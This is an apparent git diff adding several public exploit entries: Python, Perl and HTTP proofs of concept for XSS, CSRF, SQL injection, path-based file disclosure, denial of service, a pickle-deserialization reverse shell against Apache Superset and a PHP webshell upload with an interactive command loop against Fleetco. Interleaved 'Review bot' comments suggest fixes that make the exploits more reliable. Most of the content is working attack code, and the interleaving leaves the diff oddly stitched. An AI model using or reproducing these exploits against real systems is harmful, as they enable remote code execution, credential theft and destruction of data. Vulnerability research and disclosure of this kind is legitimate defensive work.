diff --git a/exploits/hardware/webapps/45928.txt b/exploits/hardware/webapps/45928.txt
new file mode 100644
index 000000000..324c1573f
--- /dev/null
+++ b/exploits/hardware/webapps/45928.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting
+# Date: 2018-11-27
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.rockwellautomation.com/
+# Version: 1408-EM3A-ENT B
+# Tested on: It is a proprietary devices: https://ab.rockwellautomation.com/zh/Energy-Monitoring/1408-PowerMonitor-1000
+# CVE : N/A
+
+# 1. Description:
+# In Rockwell Automation Allen-Bradley PowerMonitor 1000 web page,
+# user can add a new user by access the /Security/Security.shtm.
+# When users add a new user, the new user’s account will in the post data.
+# Attackers can inject malicious XSS code in user’s account parameter of post data.
+# The user’s account parameter will be stored in database, so that cause a stored XSS vulnerability.
+
+# 2. Proof of Concept:
+# Browse http:///Security/Security.shtm
+# In page Security.shtm, add a new user
+# Send this post data:
+
+/Security/cgi-bin/security|0|0|
\ No newline at end of file
diff --git a/exploits/linux/dos/45934.txt b/exploits/linux/dos/45934.txt
new file mode 100644
index 000000000..e8c6f8334
--- /dev/null
+++ b/exploits/linux/dos/45934.txt
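Review bot: The proof of concept at the end of the hunk does not contain the injected value: the request line `/Security/cgi-bin/security|0|0|` stops after the field delimiters and the target line reads `http:///Security/Security.shtm` with no host, so the placeholder and the XSS payload have evidently been stripped and the PoC is not reproducible as written. The description also implies a precondition that should be stated up front: adding a user via /Security/Security.shtm requires an account that already has user-management rights, so this is stored XSS from one privileged user against the other operators who later view the user list, not an unauthenticated issue. I would add `# Precondition: authenticated access to the Security page (user-management privilege) is required to store the payload; it fires for any user who later views the account list.` The `# CVE : N/A` line should be rechecked before publication, since identifiers for ICS web-interface issues are frequently assigned after the initial disclosure.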
@@ -0,0 +1,24 @@
+# Exploit Title: Budabot 4.0 - Denial of Service (PoC)
+# Date: 2018-10-15
+# Exploit Author: Ryan Delaney
+# Author Contact: ryan.delaney@owasp.org
+# Vendor Homepage: http://budabot.com/
+# Software Link: http://budabot.com/forum/viewtopic.php?f=8&t=1413
+# Version: 0.6 -> 4.0
+# Tested on: 4.0
+# CVE: CVE-2018-19290
+
+# 1. Description
+# In modules/HELPBOT_MODULE in Budabot 0.6 through 4.0, lax syntax validation
+# allows remote attackers to perform a command injection attack against the
+# PHP daemon with a crafted command, resulting in a denial of service or
+# possibly unspecified other impact. In versions before 3.0,
+# modules/HELPBOT_MODULE/calc.php has the vulnerable code; in 3.0 and above,
+# modules/HELPBOT_MODULE/HelpbotController.class.php has the vulnerable code.
+
+# 2. Proof of Concept
+
+Start the Budabot listener, set valid configuration options, and wait for
+the chatbot to announce it's ready in-game.
+Send the chatbot a private message containing "!calc 5 x 5", and the
+Budabot listener will terminate.
\ No newline at end of file
diff --git a/exploits/linux/webapps/45929.py b/exploits/linux/webapps/45929.py
new file mode 100755
index 000000000..e5c34345d
--- /dev/null
+++ b/exploits/linux/webapps/45929.py
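Review bot: The description classifies the flaw as unvalidated input reaching a command path ("command injection attack against the PHP daemon", "possibly unspecified other impact"), yet the PoC only shows the process terminating on `!calc 5 x 5` and the file never says which impact was actually verified. If the calc handler hands the expression to an interpreter or shell, the same input path would allow more than a crash, so the advisory should either demonstrate that or state plainly that only denial of service was confirmed; I would add `# Note: only process termination was confirmed in testing; code execution through the same input path has not been ruled out.` Since the tested build is 4.0, only the 3.0+ HelpbotController.class.php path named in the description was actually exercised, and the pre-3.0 calc.php claim rests on the CVE text rather than on this test.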
@@ -0,0 +1,64 @@ +# Exploit Title: PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure +# Date: 2018-11-28 +# Exploit Author: paragonsec @ Critical Start +# Vendor Homepage: https://live.paloaltonetworks.com/t5/Expedition-Migration-Tool/ct-p/migration_tool +# Software Link: https://paloaltonetworks.app.box.com/s/davuvo65k727nm7feuug0d783zo6fjx8 +# Version: 1.0.106 +# Tested on: Linux +# CVE : 2018-10142 + +#!/usr/bin/env python + +import argparse +import requests +import sys +import collections + +#Colors +OKRED = '\033[91m' +OKGREEN = '\033[92m' +ENDC = '\033[0m' + +parser = argparse.ArgumentParser() +parser.add_argument("--rhost", help = "Remote Host") +parser.add_argument('--file', help = 'File to check (e.g /etc/passwd, /etc/shadow)') +args = parser.parse_args() + +# Check to ensure at least one argument has been passed +if len(sys.argv)==1: + parser.print_help(sys.stderr) + sys.exit(1) + +rhost = args.rhost +rfile = args.file + +exploit_url = "http://" + rhost + "/API/process/checkPidStatus.php" + +headers = [ + ('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'), + ('Accept', 'application/json, text/javascript, */*; q=0.01'), + ('Accept-Language', 'en-US,en;q=0.5'), + ('Accept-Encoding', 'gzip, deflate'), + ('Connection', 'close') +] + +# probably not necessary but did it anyways +headers = collections.OrderedDict(headers) + +# Setting up GET body parameters +body = "pid=/../" + rfile + +print(OKGREEN + "Author: " + ENDC + "paragonsec @ Critical Start (https://www.criticalstart.com)") +print(OKGREEN + "CVE: " + ENDC + "2018-10142") +print(OKGREEN + "Description: " + ENDC + "Information Disclosure in Expedition Migration Tool") +print(OKGREEN + "Vuln Versions: " + ENDC + "< 1.0.107\n") + +print(OKGREEN + "[+]" + ENDC + "Running exploit...") + +s = requests.Session() + +req = requests.post(exploit_url, headers=headers, data=body) +if "false" not in req.text: + print(OKGREEN + "[+]" + ENDC + "Exploit 
worked! " + rfile + " exists!\n") +else: + print(OKRED + "[!]" + ENDC + "File " + rfile + " does not exist!\n") \ No newline at end of file diff --git a/exploits/linux/webapps/45933.py b/exploits/linux/webapps/45933.py new file mode 100755 index 000000000..5e9571e0b --- /dev/null +++ b/exploits/linux/webapps/45933.py 
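Review bot: The file name is spliced unencoded into the request body, `body = "pid=/../" + rfile`, so any path containing `&`, `+`, `#` or a space is mangled before it reaches checkPidStatus.php; passing `data={"pid": "/../" + rfile}` lets requests form-encode it. The success test `if "false" not in req.text` also reports "Exploit worked" for any response that is not the expected JSON, such as a 404 or login page, so the script should check `req.status_code` and parse the JSON rather than substring-match. `--rhost` is optional in the parser, so running with only `--file` fails with a TypeError on the string concatenation instead of a usage message; use `parser.add_argument("--rhost", required=True, ...)`. Minor: `s = requests.Session()` is created and never used, and the request has no `timeout=`, so an unresponsive host hangs the tool. As written the script is only an existence oracle; if the endpoint echoes file contents, print `req.text` so the information disclosure the title claims is actually shown.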
@@ -0,0 +1,97 @@ +# Exploit Title: Apache Superset 0.23 - Remote Code Execution +# Date: 2018-05-17 +# Exploit Author: David May (david.may@semanticbits.com) +# Vendor Homepage: https://superset.apache.org/ +# Software Link: https://github.com/apache/incubator-superset +# Version: Any before 0.23 +# Tested on: Ubuntu 18.04 +# CVE-ID: CVE-2018-8021 + +# I originally disclosed this to the Apache Superset team back in May, and the fix had already been +# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE. + +#!/usr/bin/env python + +import sys +import os +from lxml import html +import requests + +# Change these values to your TCP listener +myIP = '192.168.137.129' +myPort = '8888' +# Credentials must belong to user with 'can Import Dashboards on Superset' privilege +username = 'test' +password = 'test' + +# Logic in case script arguments are not given +if len(sys.argv) < 3: + print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...') + print('Script Usage:') + print('./supersetrce.py ') + sys.exit() + +else: + # Script arguments + supersetIP = sys.argv[1] + supersetPort = sys.argv[2] + # Verify these URLs match your environment + login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/' + upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards' + + # Checks to see if file that we are going to write already exists in case this is run more than once + if os.path.isfile('evil.pickle'): + os.remove('evil.pickle') + + # Headers that we append to our POST requests + headers_dict = { + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0', + 'DNT': '1', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } + + # Creates evil pickle file and writes the reverse shell to it + evilPickle = open('evil.pickle','w+') + evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 
0/tmp/backpipe\'\ntR.') + evilPickle.close() + + # Start a session so we have persistent cookies + session = requests.session() + + # Grabs the Login page to parse it for its CSRF token + login_page = session.get(login_URL) + if login_page.status_code != 200: + print('Login page not reached, verify URLs in script') + login_tree = html.fromstring(login_page.content) + csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value') + + # Form data that is sent in the POST request to Login page + login_data = { + 'csrf_token' : csrf_token, + 'username' : username, + 'password' : password, + } + + # Adds the Referer header for the login page + headers_dict['Referer'] = login_URL + + # Logon action + login = session.post(login_URL, headers=headers_dict, data=login_data) + + # Grabs the Upload page to parse it for its CSRF token + upload_page = session.get(upload_URL) + if upload_page.status_code != 200: + print('Upload page not reached, verify credentials and URLs in script') + upload_tree = html.fromstring(upload_page.content) + csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value') + + # Adds the Referer header for the Upload page + headers_dict['Referer'] = upload_URL + + # Upload action + upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token':csrf_token}, files={'file':('evil.pickle',open('evil.pickle','rb'),'application/octet-stream')}) + + # Closes the session + session.close() + sys.exit() \ No newline at end of file diff --git a/exploits/php/webapps/45927.py b/exploits/php/webapps/45927.py new file mode 100755 index 000000000..2528a4a2b --- /dev/null +++ b/exploits/php/webapps/45927.py 
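Review bot: The pickle payload as it appears here, `/bin/sh 0/tmp/backpipe`, contains no redirection operators and never references `myIP` or `myPort`, so the reverse-shell half of the command has evidently been lost in rendering (angle brackets stripped); the usage string `./supersetrce.py ` has lost its placeholders the same way, so this listing is not runnable verbatim. Every failure path only prints and continues: the two `status_code != 200` checks fall through, and neither `login` nor `upload` is inspected, so a bad password still ends with a silent exit; add `sys.exit(1)` after each message and test `upload.status_code` before reporting success. Writing the payload to `evil.pickle` in the working directory and then reopening it is unnecessary since `files=` accepts in-memory bytes; building the payload as a bytes object would also remove the Python 2/3 text-mode ambiguity of `open(..., 'w+')`. The comment already notes the import-dashboards privilege requirement, which is the key precondition for this authenticated deserialization RCE and should stay.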
@@ -0,0 +1,77 @@ +# Exploit Title: Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution +# Date: 2018-11-23 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Contact: https://pentest.com.tr +# Vendor Homepage: https://www.fleetco.space +# Software Link: http://www.fleetco.space/download/215/ +# Version: v1.2 +# Category: Webapps +# Tested on: XAMPP for Linux 1.7.2 +# Software Description : Fleetco FMM is a free, web-based vehicle fleet maintenance management +# system written in PHP with MySQL database backend. +# Description : Fleetco 1.2 and lower versions allows to upload arbitrary ".php" files which +# leads to a remote command execution on the remote server. Any authorized user is enough to exploit. +# ================================================================== +# PoC: + +#!/usr/bin/python + +import mechanize +import sys +import cookielib +import requests +import colorama +from colorama import Fore + +print "\n[*] Fleetco Fleet Maintenance Management v1.2 - Remote Code Execution" +print "[*] Vulnerability discovered by AkkuS" +print "[*] My Blog - https://www.pentest.com.tr\n" +if (len(sys.argv) != 2): + print "[*] Usage: poc.py " + exit(0) + +rhost = sys.argv[1] + +# User Information Input +UserName = str(raw_input("User Name: ")) +Password = str(raw_input("Password: ")) + +# Login into site +print(Fore.BLUE + "+ [*] Loging in...") +br = mechanize.Browser() +br.set_handle_robots(False) + +# Cookie Jar +cj = cookielib.LWPCookieJar() +br.set_cookiejar(cj) + +br.open("http://"+rhost+"/login.php") +assert br.viewing_html() +br.select_form(name="form1") +br.select_form(nr=0) +br.form['username'] = UserName +br.form['password'] = Password +br.submit() + +# Where are you +title = br.title() +print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now") + +# Create Accident Records with multipart/form-data to RCE +rce_headers = {"Content-Type": "multipart/form-data; boundary=---------------------------10664657171782352435254769348"} 
+rce_data="-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Fleet_1\"\r\n\r\nCargo Carriers\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Vehicle_1\"\r\n\r\nBF1470\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Type_1\"\r\n\r\nLorry\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Date_1\"\r\n\r\n11/07/2018\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Date_1\"\r\n\r\ndate2\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Time_1\"\r\n\r\ntime\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Driver_1\"\r\n\r\nAntony Croos\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Details_1\"\r\n\r\ntest\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Images_1\"\r\n\r\nupload2\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Images_1\"; filename=\"RCE.php\"\r\nContent-Type: application/x-php\r\n\r\n\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"\"; die; }?>\n\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"filename_Images_1\"\r\n\r\nRCE.php\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_EnteredBy_1\"\r\n\r\nMark Croos\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_SysDate_1\"\r\n\r\n2018-11-23 14:58:09\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: 
form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"a\"\r\n\r\nadded\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"rndVal\"\r\n\r\n0.8040138072331872\r\n-----------------------------10664657171782352435254769348--\r\n" + +upload = requests.post("http://"+rhost+"/accidents_add.php?submit=1&", headers=rce_headers, cookies=cj, data=rce_data) +if upload.status_code == 200: + print (Fore.GREEN + "+ [*] Shell successfully uploaded!") + +# Shell validation and exploit +while True: + shellctrl = requests.get("http://"+rhost+"/files/RCE.php") + if shellctrl.status_code == 200: + Command = str(raw_input(Fore.WHITE + "shell> ")) + URL = requests.get("http://"+rhost+"/files/RCE.php?cmd="+Command+"") + print URL.text + else: + print (Fore.RED + "+ [X] Unable to upload or access the shell") + sys.exit() \ No newline at end of file diff --git a/exploits/php/webapps/45930.pl b/exploits/php/webapps/45930.pl new file mode 100755 index 000000000..c956b7b63 --- /dev/null +++ b/exploits/php/webapps/45930.pl 
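Review bot: The uploaded webshell body in `rce_data` begins with `"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>`, i.e. the PHP opening tag and the `if`/`echo "` that the closing `}?>` balances are missing, so the payload has been truncated in rendering and the file written to `/files/RCE.php` would not be valid PHP as shown. The interactive loop appends the operator's input raw to the URL, `"/files/RCE.php?cmd="+Command`, so commands containing spaces, `&`, `#` or `%` are corrupted; use `requests.get(url, params={"cmd": Command})`. Treating `upload.status_code == 200` as "Shell successfully uploaded!" is misleading because a rejected form also returns 200 here; the real confirmation is the later GET on `/files/RCE.php`, so the message should be moved after that check. `br.select_form(name="form1")` is immediately overridden by `br.select_form(nr=0)`; keep one.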
@@ -0,0 +1,55 @@ +# Exploit Title: Joomla! Component JE Photo Gallery 1.1 - SQL Injection +# Dork: N/A +# Date: 2018-11-26 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://joomlaextensions.co.in +# Software Link: http://joomlaextensions.co.in/download/1387375463_JE%20PhotoGallery%20(%20J-%203.0%20).zip +# Version: 1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) + +#!/usr/bin/perl -w + +sub clear{ +system(($^O eq 'MSWin32') ? 'cls' : 'clear'); } +clear(); +print " + ./ + (o o) +###############################oOOo-(-)-oOOo############################### + ______ _______ ___ _ __ _____ _______ ___________ _ __ + / _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / / + / // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ / + _/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| / + /___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/ + + WWW.IHSAN.NET + + + Joomla! Component JE Photo Gallery 1.1 - SQL Injection +############################################################################ +"; + +use LWP::UserAgent; +print "\nTarget:[http://site.com/path/]: "; +chomp(my $target=); +print "\n[!] Exploiting Progress...\n"; +print "\n"; +$UT="wizjk_users"; +$S="index.php?"; +$I="tmpl=component&option=com_jephotogallery&view=category&task=fetchimage&categoryid="; +$E="%2d%32%39%20%55%4e%69%6f%6e%20%73%65%4c%45%43%54%20%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%75%73%65%72%6e%61%6d%65%2c%30%78%33%61%2c%70%61%73%73%77%6f%72%64%29%20%46%52%4f%4d%20".$UT."%29%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%4e%75%4c%4c%2c%30%2c%30%2d%2d%20%2d"; +$SIE = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$SIE->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'); +$host = $target . 
"".$S."".$I."".$E.""; +$res = $SIE->request(HTTP::Request->new(GET=>$host)); +$answer = $res->content; if ($answer =~/{"id":"(.*?)"/){ +print "[+] Success !!!\n"; +print "\n[+] Detail : $1\n"; +print "\n"; +} +else{print "\n[-]Not found.\n"; +} \ No newline at end of file diff --git a/exploits/php/webapps/45932.txt b/exploits/php/webapps/45932.txt new file mode 100644 index 000000000..97a8b9bdb --- /dev/null +++ b/exploits/php/webapps/45932.txt @@ -0,0 +1,77 @@ +# Exploit Title: PHP Server Monitor 3.3.1 - Cross-Site Request Forgery +# Exploit Author: Javier Olmedo +# Website: https://www.sidertia.com +# Date: 2018-11-28 +# Google Dork: N/A +# Vendor: https://www.phpservermonitor.org/ +# Software Link: https://github.com/phpservermon/phpservermon/releases/tag/v3.3.1 +# Affected Version: 3.3.1 and possibly before +# Patched Version: update to 3.3.2 +# Category: Web Application +# Platform: Windows & Ubuntu +# Tested on: Win10x64 & Kali Linux +# CVE: N/A +# References: +# https://github.com/phpservermon/phpservermon/issues/670 +# https://www.sidertia.com/Home/Community/Blog/2018/11/28/Corregidas-las-vulnerabilidades-CSRF-descubiertas-en-PHP-Server-Monitor + +# 1. Technical Description: +# PHP Server Monitor version 3.3.1 and possibly before are affected by multiple +# Cross-Site Request Forgery vulnerability, an attacker could remove users, logs, +# and servers. + +# 2.1 Proof Of Concept (Delete User): + +(Method 1) +Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=user&action=delete&id=[ID]) and send it to the victim. + +(Method 2) +Use next form and send it tho the victim. + + + +
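Review bot: `chomp(my $target=);` has lost its `<STDIN>` read in rendering, so the script does not compile as printed and the target prompt never reads input. The table name is hard-coded, `$UT="wizjk_users"`, and the URL-encoded payload decodes to `-29 UNION SELECT (SELECT GROUP_CONCAT(username,0x3a,password) FROM wizjk_users),0,0,0,0,0,0,0,0,NULL,0,0-- -`, but Joomla generates a random table prefix per installation, so this only works against the author's test site; prompt for the prefix or resolve it from `information_schema.tables` first. The match `/{"id":"(.*?)"/` uses an unescaped `{`, which newer Perl releases warn about or reject in some positions; write `\{"id":"(.*?)"` to be safe. The filename in the index is `45930.pl` but the header gives no CVE; that is fine, though the listing should say the injection is unauthenticated via `com_jephotogallery` `categoryid` if that is what was tested, since nothing in the script logs in.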
+ + + + +
+ + + +# 2.2 Proof Of Concept (Delete Server): + +(Method 1) +Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=server&action=delete&id=[ID]) and send it to the victim. + +(Method 2) +Use next form and send it tho the victim. + + + +
+ + + + +
+ + + +# 2.3 Proof Of Concept (Delete All Logs): + +(Method 1) +Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=server_log&action=delete) and send it to the victim. + +(Method 2) +Use next form and send it tho the victim. + + + +
+ + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45935.txt b/exploits/php/webapps/45935.txt new file mode 100644 index 000000000..6da38b45f --- /dev/null +++ b/exploits/php/webapps/45935.txt 
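Review bot: Each "Method 2" section ends with "Use next form and send it tho the victim." followed only by empty added lines, so the HTML forms that constitute the second PoC have been stripped in rendering and the advisory as shown only demonstrates the bare GET URLs. The precondition is never stated: the victim must hold an authenticated PHP Server Monitor session with rights to delete users, servers and logs, and the forged request rides on that session's cookies; I would add `# Precondition: the victim is logged in to PHP Server Monitor with permission to delete users/servers/logs.` The technical description should name the cause, which the URLs make visible: state-changing actions are performed via GET parameters (`mod=user&action=delete&id=`) with no anti-CSRF token, which is presumably what 3.3.2 changed. Wording: "multiple Cross-Site Request Forgery vulnerability" should be "vulnerabilities" and "tho the victim" should be "to the victim".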
@@ -0,0 +1,33 @@ +# Exploit Title: Wordpress Plugins Advanced-custom-fields 5.7.7 - Cross-Site Scripting +# Google Dork: N/A +# Date: 2018-12-02 +# Exploit Author: Loading Kura Kura +# Vendor Homepage: https://www.advancedcustomfields.com/] +# Software Link: https://www.advancedcustomfields.com/ +# Version: 5.7.7 +# Tested on: Win10 x64/Kali linux x64 +# CVE : N/A + +# description: +# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins easy testimonials 3.2. +# Three parameters(_ikcf_client _ikcf_position _ikcf_other) have Cross-Site Scripting. + +# Paramater: acf_fields[11][label] +# PoC + +POST /wordpress/wp-admin/post.php HTTP/1.1 +Host: localhost +Content-Length: 2838 +Cache-Control: max-age=0 +Origin: http://localhost +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://localhost/wordpress/wp-admin/post.php?post=8&action=edit +Accept-Encoding: gzip, deflate +Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6 +Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1543850245%7CLBSY8ANOj9TKCX2YpnzKJoZ5N75oRW4ZGkZZrw5INPt%7C74dd4284fad8e2f658d13db3d669d0d61976654b4b9e7b4a820b0156fb018264; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1543850245%7CLBSY8ANOj9TKCX2YpnzKJoZ5N75oRW4ZGkZZrw5INPt%7Cd0b0455678fae203a81b5c23b42dbfa51b0ab665e33607d2b09b1d5d62cc36be; wp-settings-time-1=1543678278; wp-settings-1=mfold%3Do; hblid=gR3SowbFiR0QuMDg3m39N0I6Bo2jr38A; olfsk=olfsk8076045099904943; _gcl_au=1.1.201976856.1543314650 +Connection: close + 
+_wpnonce=415211ddca&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=acf-field-group&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action%3Dedit&post_ID=8&meta-box-order-nonce=2cc12cc441&closedpostboxesnonce=bbd0be706b&post_title=xss&samplepermalinknonce=4f1f2ec280&_acf_screen=field_group&_acf_post_id=8&_acf_nonce=191e753914&_acf_validation=0&_acf_changed=1&_acf_delete_fields=0%7C9&original_publish=Update&save=Update&acf_fields%5B11%5D%5BID%5D=11&acf_fields%5B11%5D%5Bkey%5D=field_5c02a79cc0f83&acf_fields%5B11%5D%5Bparent%5D=8&acf_fields%5B11%5D%5Bmenu_order%5D=0&acf_fields%5B11%5D%5Bsave%5D=settings&acf_fields[11][label]=%3Cscript%3Ealert%28%22loadingkurakura%22%29%3C%2Fscript%3E&acf_fields%5B11%5D%5Bname%5D=%3Cscript%3Ealert%28%22loadingkurakura1%22%29%3C%2Fscript%3E&acf_fields%5B11%5D%5Btype%5D=text&acf_fields%5B11%5D%5Binstructions%5D=&acf_fields%5B11%5D%5Brequired%5D=0&acf_fields%5B11%5D%5Brequired%5D=1&acf_fields%5B11%5D%5Bdefault_value%5D=&acf_fields%5B11%5D%5Bplaceholder%5D=&acf_fields%5B11%5D%5Bprepend%5D=&acf_fields%5B11%5D%5Bappend%5D=&acf_fields%5B11%5D%5Bmaxlength%5D=&acf_fields%5B11%5D%5Bconditional_logic%5D=0&acf_fields%5B11%5D%5Bwrapper%5D%5Bwidth%5D=&acf_fields%5B11%5D%5Bwrapper%5D%5Bclass%5D=&acf_fields%5B11%5D%5Bwrapper%5D%5Bid%5D=&acf_fields%5B10%5D%5BID%5D=10&acf_fields%5B10%5D%5Bkey%5D=field_5c02a7abc0f84&acf_fields%5B10%5D%5Bparent%5D=8&acf_fields%5B10%5D%5Bmenu_order%5D=1&acf_fields%5B10%5D%5Bsave%5D=meta&acf_fields%5B12%5D%5BID%5D=12&acf_fields%5B12%5D%5Bkey%5D=field_5c02a7abc0f84&acf_fields%5B12%5D%5Bparent%5D=8&acf_fields%5B12%5D%5Bmenu_order%5D=2&acf_fields%5B12%5D%5Bsave%5D=meta&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_0%5D%5Bparam%5D=post_ty
pe&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_0%5D%5Boperator%5D=%3D%3D&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_0%5D%5Bvalue%5D=post&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_1%5D%5Bparam%5D=post_type&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_1%5D%5Boperator%5D=%3D%3D&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_1%5D%5Bvalue%5D=post&acf_field_group%5Bactive%5D=0&acf_field_group%5Bactive%5D=1&acf_field_group%5Bstyle%5D=default&acf_field_group%5Bposition%5D=normal&acf_field_group%5Blabel_placement%5D=top&acf_field_group%5Binstruction_placement%5D=label&acf_field_group%5Bmenu_order%5D=0&acf_field_group%5Bdescription%5D=ddd&acf_field_group%5Bhide_on_screen%5D=&acf_field_group%5Bhide_on_screen%5D%5B%5D=the_content&acf_field_group%5Bkey%5D=group_5c02a6cfa31d6&post_name=group_5c02a6cfa31d6 \ No newline at end of file diff --git a/exploits/windows/dos/45931.txt b/exploits/windows/dos/45931.txt new file mode 100644 index 000000000..6cc1e22ac --- /dev/null +++ b/exploits/windows/dos/45931.txt 
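Review bot: The description block belongs to a different advisory: it names "wordpress plugins easy testimonials 3.2" and the parameters `_ikcf_client _ikcf_position _ikcf_other`, which contradict the title (Advanced Custom Fields 5.7.7) and the PoC body, where the payloads sit in `acf_fields[11][label]` and also `acf_fields[11][name]`. Replace it with `# A stored cross-site scripting (XSS) issue was found in the Advanced Custom Fields WordPress plugin 5.7.7.` and `# Parameters: acf_fields[11][label], acf_fields[11][name]`. The request carries administrator cookies plus `_wpnonce` and `_acf_nonce`, so the payload can only be stored by a user allowed to edit field groups; the advisory should state that role, because administrators on single-site WordPress normally hold `unfiltered_html` and vendors often rate admin-only stored XSS as low impact. Minor: stray `]` after the Vendor Homepage URL and "Paramater" for "Parameter".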
@@ -0,0 +1,94 @@ +# Exploit Title: Mozilla Firefox 63.0.1 - Denial of Service (PoC) +# Date: 2018-11-29 +# Exploit Author: SAIKUMAR CHEBROLU +# Vendor Homepage: https://www.mozilla.org/en-US/firefox/new/ +# Bugzilla report: https://bugzilla.mozilla.org/show_bug.cgi?id=1504512 +# Version: Firefox 63.0.1 +# Tested on: Windows 10 +# CVE : No CVE is been assigned to this bug. + +# To exploit this vulnerability please follow the below steps. +# Firefox is being crashed, when it tried to process the chunked data. when Transfer-Encoding header +# is used, we suppose to send the data in the chunks form. When all the chunks being transferred, +# we need to tell the client with chunk length zero. so that it understands chunked stream completed. + +# But if we send the data after sending zero length, then firefox not able to understand it, +# and it being crashed. + +# Example: + +5 + +Don't + +5 + +be af + +5 + +firef + +5 + +ox is + +0 + +Crash (after saying it is end, we still sending some data) + +\r\n + +# here we are saying no chunked data after this.so that it should end with \r\n. But we +# are sending some data after this also. Like + +# Steps to reproduce the crash + +1)download the firefoxcrash.txt + +2)nc -lp 8000 < firefoxcrash.txt + +3)browe the url from firefox like http://localhost:8000 + +4)then close the netcat client. then you will obserev the firefox crash. + +# fireforcrash.txt + +HTTP/1.1 200 ok +Content-type: application/octet-stream +Content-disposition: attachment; filename="crash.txt" +Transfer-Encoding: chunked +Connection: close + +5 +I am +5 + be a +5 +fraid +5 + to l +5 +ook a +5 +t thi +5 +s mes +5 +sage. +5 + It i +5 +s com +5 +plete +5 +ly ha +5 +rmles +5 +s. Re +5 +ally! +0 +foobar \ No newline at end of file diff --git a/exploits/windows/remote/45926.py b/exploits/windows/remote/45926.py new file mode 100755 index 000000000..f64bcf576 --- /dev/null +++ b/exploits/windows/remote/45926.py 
